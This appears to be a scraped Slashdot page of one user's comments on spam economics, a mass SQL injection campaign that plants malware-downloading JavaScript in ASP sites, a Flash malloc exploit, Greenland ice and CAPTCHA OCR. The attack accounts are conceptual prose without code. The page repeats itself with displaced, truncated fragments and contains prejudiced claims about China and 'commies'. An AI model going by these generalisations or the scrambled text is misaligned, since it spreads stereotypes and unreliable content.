My hypothesis are: 1) Spam is not used in the effort of making money, but as a way of crippling the internet for sport. OR 2) The majority of spam is sent by poor, hungry and stupid script kiddies who are as of now still poor, hungry and stupid.
Wrong on both counts. It's free to send spam, heck, more free than free, zombie PC's are sending them out. It requires effort and coordination to keep track of what spam you got, and these crime gangs aren't going to go to any effort to do that.
No one cares. It's a numbers game. The more, the better. And it's free. For them.
For us, some occasional schmuck does something that lets them take their money, way more than they ever imagined. What, you think this is Wal-Mart versus KMart on prices and service?
No, these are criminals out to separate you from your money.
They are mostly spammed for different purposes, although there is plenty of viagra forum spamming, the kind that go to inboxes.
Forum spamming is mostly for posting links to sites that will try to download malware and take over your PC. That's their goal, that's where the money is, if not yours they will see if they can follow your connections and get through into a private corporate, government, or financial network. Meanwhile your PC is instructed to probe ports and try to take over more PC's and/or generate even more spam to others.
Always believe in money as the answer. They try to break in 24 hours a day on forums. They do it because it pays.
The only ones that I know about and make sense to me are undeliverable messages from email servers that got email from a spammer using some bogus from address with your domain. If you don't have a domain and mail server, I'm not sure how often they'd use something like a legitimate personal email address, if ever. Unless they happened to use your personal address as a bogus from address for spamming, you'd never see undelierables backscatter.
What exactly do they have to gain by sending thousands of messages to one person (and this sounds like it was from one source)? Are they just trying to evade the spam filter, or do they perhaps think that if they just send enough, finally you'll start to believe them?
As usual, the answer is follow the money. They are not sending thousands of messages to you, they are sending millions of messages to millions of email addresses. Their return address? Perhaps your address, or a made up address from a legitimate domain, but not theirs.
They are not looking for a return email, a dialogue, a "could you send me some more info" stuff. These are professional thieves, crime gangs, mostly commies or at least third world socialists at best, out to clean the capitalist's clock and laugh at their ignorance and greed, of which we are exceedingly blessed with a bountiful harvest, or as Barnum said, one born every minute.
By using legitimate domains as return addresses, they get through spam filters for blacklisted domains. But heck, domains? These are being sent from PC's taken over and added to zombie networks, so there is no domain. There's only some schmuck's PC sending out spam while he goes, "Geez, muy PC is slow. What's up with that dude? Hey, did you see this latest stuff I ripped off? Free downloads! kewl..."
The emails generate business. They have links which will take over your computer while lieing to you about it. They pump up penny stocks, getting people to buy because wow man I can triple my money for a few dollars, man this is easy money, then they sell their stock they actually bought at a few pennies and you get to play musical chairs with all the other Wall Street wannabes.
And of course getting you to click on a link that takes over your PC is just the start of many more adventures, such as logging your keystrokes and sending them to one of our good friends in Eurasia where they are analyzed for bank account logins, payPal, eBay, a login to your corporate network, logins to networks they will infiltrate to see if it's a military or financial or government network with lots of money and secrets.
So in short, it's war, and backscatter is trivial collateral damage.
I have Postini on my email account and it blocks almost all spam, and about 80% of this non-deliverable stuff.
The first time you get it is very shocking, hundreds of emails coming in at once, but I just highlight the first header in my Inbox, hold my finger down on the arrow, and highlight whatever gets through Postini, then hit Delete. Pretty easy to see legitimate mail from these undeliverable messages.
So very easily taken care of, easier than blocking the forum spammers who apparently use email addresses from a site server where they are not able to get through to spam the forum.
If you don't have a spam blocker and are set up for your PC to talk to you everytime an email arrives, then one of these attacks would be the start of a long relationship.
I'm all for getting rid of threads, but what are you going to replace them with?
Separate jobs communicating with message queues in some case. Communications should be isolated out to a separate job so the OS is coordinating multi-tasking, not the program.
Some things I understand is threaded for responsiveness, such as monitoring for keystrokes while painting screens, but an interrupt mechanism would do it I think, where you get the responsiveness but no contention on data to update.
In general, thread() safe programming replaced by multiple lightweight OS jobs communicating.
I wrote my GW-BASIC code with Wordstar/ I didn't know it had an editor. I remember the editor and how different that was when I did a gig with QBasic in late 80's.
Microsoft's GW-Basic was a real workhorse on the early PC's in the 80's. I have to tell you that what we did with a few hundred k of memory, a 10 meg disk, and a 5 or 6 MHz CPU doesn't seem like it could be done considering what it takes nowadays.
And yet, apache users don't have to worry about this. Why? That's the argument I want to have.
Because the likely first step is bad guys in China scanning Google search results for web pages ending in.asp or.aspx. They then retrieve the pages and fill in forms with an SQL statement containing javascript code as a string and submit the page. All of this is automated.
In this case, it's SQL Server specific SQL syntax that retrieves field layouts for the database, then inserts thia attacker's javascript string into *every* text database field that will hold it in the entire database. Holy cow.
Then any page whatsoever that retrieves any data from the database and displays it in a web page will pull the javascript along with the data and execute it after showing the data. That javascript then downloads malware from a specified Chinese site to the PC.
Personally I am blown away by the incompetence of the defense attorney. Clearly he must have understood Reiser (guilty or not) would not help his case by testifying. He should never have been put on the stand.
However, it is now abundantly clear that the attack is NOT ASP-specific...
I guess it's.asp specific because.asp web pages with form fields were targeted and SQL Server specific metadata was SELECTed to get fields to update with javascript, which in itself is not.asp specific but SQL Server specific.
But it is not abundantly clear to me why your post is modded informative. Did you find sites that were not IIS to be infected with this?
I though tha javascript was rather limited in what it could do on a client. But I guess all it needs for some types of SQL injection is the ability to rewrite URLs and html data pages which it pretty much has to have. Or is it more specific than that?
The problem with a jumble of news links and comments is that no coherent explanation is ever given for what is going on. The javascript only takes effect later, and only affects the users PC, downloading malware to it from the mentioned sites.
The first step is bad guys in China (because one, these are Chinese sites the javascript downloads malware from, and two, because the only thing coming across the net from China is bad) scanning Google search results for web pages ending in.asp or.aspx.
They then retrieve the pages and fill in forms with an SQL statement containing javascript code as a string and submit the page. What do they do this with? Not javascript. Simple programming using HTTP commands. All of this is automated.
This is where the bad programming of the people who programmed processing the web pages comes in. For those pages that don't thoroughly screen web form input for SQL commands (like "enter name, ok, here's my name plus an SQL command to insert javascript into fields in your database, how do you like them apples?" type form entry), then they will get javascript inserted into their database fields.
Sounds too bizarre to be true? Everytime a programmer just sucks whatever is entered into a web page form field and strings it together to execute it as a command to update the database, they run the risk of the part that came from the web page containing an SQL command from someone evil that does other things to the database, in other words, SQL "injected" (or more easily envisioned, appended as a second or more additional SQL commands) to the original trivial SQL statement to take name and stick it in the name field in the database.
So far javascript isn't involved. It's send down page to a program that has found it by searching Google for.asp or.aspx pages. Of course the web site doesn't know this. As far as it knows it's a person running a browser and interested in their site content.
Then the program fills in the form fields with an SQL command and submits the page. At this point just good old web server programming in whatever language (MS type, given.asp) to process the page like it's someone that wants to register or whatever the page with form fields is. So still no javascript.
But when the programming strings together with an SQL command the contents of the form field, and doesn't check that it doesn't have more SQL in it, the execution of the SQL which was intended only to insert or update a database field now does a whole lot more, whatever SQL the attacker put in that and all other form fields on the page. All it takes is one of them not to be checked properly.
And what was that SQL put in? In this case, it's MS SQL specific SQL that retrieves database layouts, then inserts the attacker's javascript string (ahh! we now see javascript but it still isn't executing yet) into *every* database field in the entire database. Holy cow. Basically what we saw from the linked IIS admin's security blog posts was that only a portion of the database would contain the javascript because SQL is typically configured to time out after a certain amount of time, so it crammed as much as it could until the plug was pulled on it.
So the javascript is in the database, in fields like name and city or whatever, but it still isn't executing and has no effect on the server whatsoever. The injected SQL, which is just SQL, not javascript, did all this because it wasn't checked for and stripped out of the web page form field.
Then what happens? Any page whatsoever that retrieves any data from the database and displa
The article states a google search found over 500,000 modified pages. The post states over 500,000 servers.
from my experience Google only shows one to a few pages from a website, and you have to click more results on a site result set to see all that would match on that site.
I did a test with data I know to be on many pages on my site and the count was 35, the top 5 from my site. I counted down the results and there were 35, with see more results as a generic show everything on all sites.
I clicked on repeat search with omitted results included and the count went to 485, and the first few hundred are from my site.
I would say if the people reporting the 500,000 pages or sites did a preliminary Google search the result count would be closer to site count, and if they clicked on repeat search with omitted results included the results count would be pages.
That is correct. This is only a recent phenonomon. I supplied information about the mass of ice on Greenland and how much that ice would raise the sea level, and that the glaciers are starting to accelerate their slide into the sea.
We also have pictures of larger areas of the Arctic seasonly melted than in recent history, and that the amount of carbon particles per million is higher than recent history and rising.
A reasoned look at the information can be made, regardless of the cause or beliefs.
Your socialist stuff (which has no basis) and Creator mentions designate your writings as from a very conservative right winger person. I don't agree with hardly anything you stand for, but I can answer a question or point out a mistaken contention regardless of the source, and I did.
Your problem is you act like all the ice is already in the ocean. Greenland holds only 10% of glacier ice but if Greenland's ice melts it will raise the sea level 21 feet.
In fact, as you point out, ice raises it just as much and it doesn't even have to melt. The glaciers just have to slide out to sea as icebergs. And scientists are watching that very thing accelerate.
I just looked at this guy's homepage and his research roadmap. If anyone has a breakthrough in AI research in the next few years I'll place my bet on him.
I don't know either flash or VMs in general, but in order for the attacker to return a fake value from a malloc call, shouldn't the attacker already have control to libc (in C) or to the internals of the VM in that case ? Meaning he already can do whatever he wants...
I don't know why this is rated Interesting, but the answer is no.
On a modern OS you have to work hard to make malloc fail. OSs will grant memory requests far above the amount of physical memory, and will even overcommit the virtual memory on the theory that you're not going to use all of it anyway.
Although this is true, the first step of the ActionScript VM (Flash) exploit was to create a malware Flash script that had a negative number for number of tags, or something of the like, which reliably causes the VM malloc processing for that parm to return NULL.
This was not a "gee, if a malloc ever returns NULL, this will work" exploit, but an exploit that starts out causing malloc to return NULL, then use the NULL pointer.
No I didn't miss the point. I said it's an awfully complex way to generate difficult to OCR images, actually one of the dumbest things I've ever heard of.
Some of the difficulties. You need to break the un-OCRable image into groups of small letters. Try running an un-OCRable "indecipherable" by anyone as a registration test (and just part of the test, you say they also have to answer another set of letters alongside it that you know what it is). You know how many people are going to say FU. It'll be close to unity.
Or with that unsettling feedback, you try break images up into smaller groups of letters and then the person doesn't have the context of the word to figure out the letter. And that's assuming you even have a clue how to break un-OCRable letter groups approximating words into smaller image subsets, which I assure you isn't trivial.
Then after all that, you have all this I don't know what it is, but I'm going to get "probabilities" and "assurances" and "I'm pretty sure this must be it because lots of people are getting close to answering it the same" control logic stuff going on.
And then after that hoopla you feed this word or small groups of letters back to some central place to be integrated into an OCR'ed document somehow.
I would call it Rube Goldberg OCR. Just amazingly stupid.
Slashdot Mirror
My hypothesis are:
1) Spam is not used in the effort of making money, but as a way of crippling the internet for sport.
OR
2) The majority of spam is sent by poor, hungry and stupid script kiddies who are as of now still poor, hungry and stupid.
Wrong on both counts. It's free to send spam, heck, more free than free, zombie PC's are sending them out. It requires effort and coordination to keep track of what spam you got, and these crime gangs aren't going to go to any effort to do that.
No one cares. It's a numbers game. The more, the better. And it's free. For them.
For us, some occasional schmuck does something that lets them take their money, way more than they ever imagined. What, you think this is Wal-Mart versus KMart on prices and service?
No, these are criminals out to separate you from your money.
rd
Why are (most) forums spammed less than inboxes?
They are mostly spammed for different purposes, although there is plenty of viagra forum spamming, the kind that go to inboxes.
Forum spamming is mostly for posting links to sites that will try to download malware and take over your PC. That's their goal, that's where the money is, if not yours they will see if they can follow your connections and get through into a private corporate, government, or financial network. Meanwhile your PC is instructed to probe ports and try to take over more PC's and/or generate even more spam to others.
Always believe in money as the answer. They try to break in 24 hours a day on forums. They do it because it pays.
rd
The only ones that I know about and make sense to me are undeliverable messages from email servers that got email from a spammer using some bogus from address with your domain. If you don't have a domain and mail server, I'm not sure how often they'd use something like a legitimate personal email address, if ever. Unless they happened to use your personal address as a bogus from address for spamming, you'd never see undelierables backscatter.
rd
What exactly do they have to gain by sending thousands of messages to one person (and this sounds like it was from one source)? Are they just trying to evade the spam filter, or do they perhaps think that if they just send enough, finally you'll start to believe them?
As usual, the answer is follow the money. They are not sending thousands of messages to you, they are sending millions of messages to millions of email addresses. Their return address? Perhaps your address, or a made up address from a legitimate domain, but not theirs.
They are not looking for a return email, a dialogue, a "could you send me some more info" stuff. These are professional thieves, crime gangs, mostly commies or at least third world socialists at best, out to clean the capitalist's clock and laugh at their ignorance and greed, of which we are exceedingly blessed with a bountiful harvest, or as Barnum said, one born every minute.
By using legitimate domains as return addresses, they get through spam filters for blacklisted domains. But heck, domains? These are being sent from PC's taken over and added to zombie networks, so there is no domain. There's only some schmuck's PC sending out spam while he goes, "Geez, muy PC is slow. What's up with that dude? Hey, did you see this latest stuff I ripped off? Free downloads! kewl..."
The emails generate business. They have links which will take over your computer while lieing to you about it. They pump up penny stocks, getting people to buy because wow man I can triple my money for a few dollars, man this is easy money, then they sell their stock they actually bought at a few pennies and you get to play musical chairs with all the other Wall Street wannabes.
And of course getting you to click on a link that takes over your PC is just the start of many more adventures, such as logging your keystrokes and sending them to one of our good friends in Eurasia where they are analyzed for bank account logins, payPal, eBay, a login to your corporate network, logins to networks they will infiltrate to see if it's a military or financial or government network with lots of money and secrets.
So in short, it's war, and backscatter is trivial collateral damage.
rd
I have Postini on my email account and it blocks almost all spam, and about 80% of this non-deliverable stuff.
The first time you get it is very shocking, hundreds of emails coming in at once, but I just highlight the first header in my Inbox, hold my finger down on the arrow, and highlight whatever gets through Postini, then hit Delete. Pretty easy to see legitimate mail from these undeliverable messages.
So very easily taken care of, easier than blocking the forum spammers who apparently use email addresses from a site server where they are not able to get through to spam the forum.
If you don't have a spam blocker and are set up for your PC to talk to you everytime an email arrives, then one of these attacks would be the start of a long relationship.
rd
I'm all for getting rid of threads, but what are you going to replace them with?
Separate jobs communicating with message queues in some case. Communications should be isolated out to a separate job so the OS is coordinating multi-tasking, not the program.
Some things I understand is threaded for responsiveness, such as monitoring for keystrokes while painting screens, but an interrupt mechanism would do it I think, where you get the responsiveness but no contention on data to update.
In general, thread() safe programming replaced by multiple lightweight OS jobs communicating.
rd
I wrote my GW-BASIC code with Wordstar/ I didn't know it had an editor. I remember the editor and how different that was when I did a gig with QBasic in late 80's.
rd
Microsoft's GW-Basic was a real workhorse on the early PC's in the 80's. I have to tell you that what we did with a few hundred k of memory, a 10 meg disk, and a 5 or 6 MHz CPU doesn't seem like it could be done considering what it takes nowadays.
rd
And yet, apache users don't have to worry about this. Why? That's the argument I want to have.
.asp or .aspx. They then retrieve the pages and fill in forms with an SQL statement containing javascript code as a string and submit the page. All of this is automated.
Because the likely first step is bad guys in China scanning Google search results for web pages ending in
In this case, it's SQL Server specific SQL syntax that retrieves field layouts for the database, then inserts thia attacker's javascript string into *every* text database field that will hold it in the entire database. Holy cow.
Then any page whatsoever that retrieves any data from the database and displays it in a web page will pull the javascript along with the data and execute it after showing the data. That javascript then downloads malware from a specified Chinese site to the PC.
Game over.
Personally I am blown away by the incompetence of the defense attorney. Clearly he must have understood Reiser (guilty or not) would not help his case by testifying. He should never have been put on the stand.
Clearly you haven't been following the case.
rd
What an obnoxious headline.
500 Thousand is more readable. Your post is what is obnoxious.
rd
However, it is now abundantly clear that the attack is NOT ASP-specific...
.asp specific because .asp web pages with form fields were targeted and SQL Server specific metadata was SELECTed to get fields to update with javascript, which in itself is not .asp specific but SQL Server specific.
I guess it's
But it is not abundantly clear to me why your post is modded informative. Did you find sites that were not IIS to be infected with this?
rd
I though tha javascript was rather limited in what it could do on a client. But I guess all it needs for some types of SQL injection is the ability to rewrite URLs and html data pages which it pretty much has to have. Or is it more specific than that?
.asp or .aspx.
.asp or .aspx pages. Of course the web site doesn't know this. As far as it knows it's a person running a browser and interested in their site content.
.asp) to process the page like it's someone that wants to register or whatever the page with form fields is. So still no javascript.
The problem with a jumble of news links and comments is that no coherent explanation is ever given for what is going on. The javascript only takes effect later, and only affects the users PC, downloading malware to it from the mentioned sites.
The first step is bad guys in China (because one, these are Chinese sites the javascript downloads malware from, and two, because the only thing coming across the net from China is bad) scanning Google search results for web pages ending in
They then retrieve the pages and fill in forms with an SQL statement containing javascript code as a string and submit the page. What do they do this with? Not javascript. Simple programming using HTTP commands. All of this is automated.
This is where the bad programming of the people who programmed processing the web pages comes in. For those pages that don't thoroughly screen web form input for SQL commands (like "enter name, ok, here's my name plus an SQL command to insert javascript into fields in your database, how do you like them apples?" type form entry), then they will get javascript inserted into their database fields.
Sounds too bizarre to be true? Everytime a programmer just sucks whatever is entered into a web page form field and strings it together to execute it as a command to update the database, they run the risk of the part that came from the web page containing an SQL command from someone evil that does other things to the database, in other words, SQL "injected" (or more easily envisioned, appended as a second or more additional SQL commands) to the original trivial SQL statement to take name and stick it in the name field in the database.
So far javascript isn't involved. It's send down page to a program that has found it by searching Google for
Then the program fills in the form fields with an SQL command and submits the page. At this point just good old web server programming in whatever language (MS type, given
But when the programming strings together with an SQL command the contents of the form field, and doesn't check that it doesn't have more SQL in it, the execution of the SQL which was intended only to insert or update a database field now does a whole lot more, whatever SQL the attacker put in that and all other form fields on the page. All it takes is one of them not to be checked properly.
And what was that SQL put in? In this case, it's MS SQL specific SQL that retrieves database layouts, then inserts the attacker's javascript string (ahh! we now see javascript but it still isn't executing yet) into *every* database field in the entire database. Holy cow. Basically what we saw from the linked IIS admin's security blog posts was that only a portion of the database would contain the javascript because SQL is typically configured to time out after a certain amount of time, so it crammed as much as it could until the plug was pulled on it.
So the javascript is in the database, in fields like name and city or whatever, but it still isn't executing and has no effect on the server whatsoever. The injected SQL, which is just SQL, not javascript, did all this because it wasn't checked for and stripped out of the web page form field.
Then what happens? Any page whatsoever that retrieves any data from the database and displa
Why not just take away text SQL queries from web development environments?
it's all they have.
The article states a google search found over 500,000 modified pages. The post states over 500,000 servers.
from my experience Google only shows one to a few pages from a website, and you have to click more results on a site result set to see all that would match on that site.
I did a test with data I know to be on many pages on my site and the count was 35, the top 5 from my site. I counted down the results and there were 35, with see more results as a generic show everything on all sites.
I clicked on repeat search with omitted results included and the count went to 485, and the first few hundred are from my site.
I would say if the people reporting the 500,000 pages or sites did a preliminary Google search the result count would be closer to site count, and if they clicked on repeat search with omitted results included the results count would be pages.
rd
That is correct. This is only a recent phenonomon. I supplied information about the mass of ice on Greenland and how much that ice would raise the sea level, and that the glaciers are starting to accelerate their slide into the sea.
We also have pictures of larger areas of the Arctic seasonly melted than in recent history, and that the amount of carbon particles per million is higher than recent history and rising.
A reasoned look at the information can be made, regardless of the cause or beliefs.
Your socialist stuff (which has no basis) and Creator mentions designate your writings as from a very conservative right winger person. I don't agree with hardly anything you stand for, but I can answer a question or point out a mistaken contention regardless of the source, and I did.
rd
You don't need a citation for this!
Your problem is you act like all the ice is already in the ocean. Greenland holds only 10% of glacier ice but if Greenland's ice melts it will raise the sea level 21 feet.
In fact, as you point out, ice raises it just as much and it doesn't even have to melt. The glaciers just have to slide out to sea as icebergs. And scientists are watching that very thing accelerate.
rd
Lost appeal? I didn't think there was that much appeal for Vista capable to start with...
click on his handle at top of page and you'll get an idea.
rd
I just looked at this guy's homepage and his research roadmap. If anyone has a breakthrough in AI research in the next few years I'll place my bet on him.
rd
I think that a better write-up may have made that more clear. The one that was actually posted on the Slashdot front page is pretty weak.
Just click on TFA. It explains it well.
rd
I don't know either flash or VMs in general, but in order for the attacker to return a fake value from a malloc call, shouldn't the attacker already have control to libc (in C) or to the internals of the VM in that case ? Meaning he already can do whatever he wants...
I don't know why this is rated Interesting, but the answer is no.
rd
explain this event in terms that a person with a sex life not involving the Internet could understand?
does blow up dolls count?
On a modern OS you have to work hard to make malloc fail. OSs will grant memory requests far above the amount of physical memory, and will even overcommit the virtual memory on the theory that you're not going to use all of it anyway.
Although this is true, the first step of the ActionScript VM (Flash) exploit was to create a malware Flash script that had a negative number for number of tags, or something of the like, which reliably causes the VM malloc processing for that parm to return NULL.
This was not a "gee, if a malloc ever returns NULL, this will work" exploit, but an exploit that starts out causing malloc to return NULL, then use the NULL pointer.
rd
No I didn't miss the point. I said it's an awfully complex way to generate difficult to OCR images, actually one of the dumbest things I've ever heard of.
Some of the difficulties. You need to break the un-OCRable image into groups of small letters. Try running an un-OCRable "indecipherable" by anyone as a registration test (and just part of the test, you say they also have to answer another set of letters alongside it that you know what it is). You know how many people are going to say FU. It'll be close to unity.
Or with that unsettling feedback, you try break images up into smaller groups of letters and then the person doesn't have the context of the word to figure out the letter. And that's assuming you even have a clue how to break un-OCRable letter groups approximating words into smaller image subsets, which I assure you isn't trivial.
Then after all that, you have all this I don't know what it is, but I'm going to get "probabilities" and "assurances" and "I'm pretty sure this must be it because lots of people are getting close to answering it the same" control logic stuff going on.
And then after that hoopla you feed this word or small groups of letters back to some central place to be integrated into an OCR'ed document somehow.
I would call it Rube Goldberg OCR. Just amazingly stupid.
rd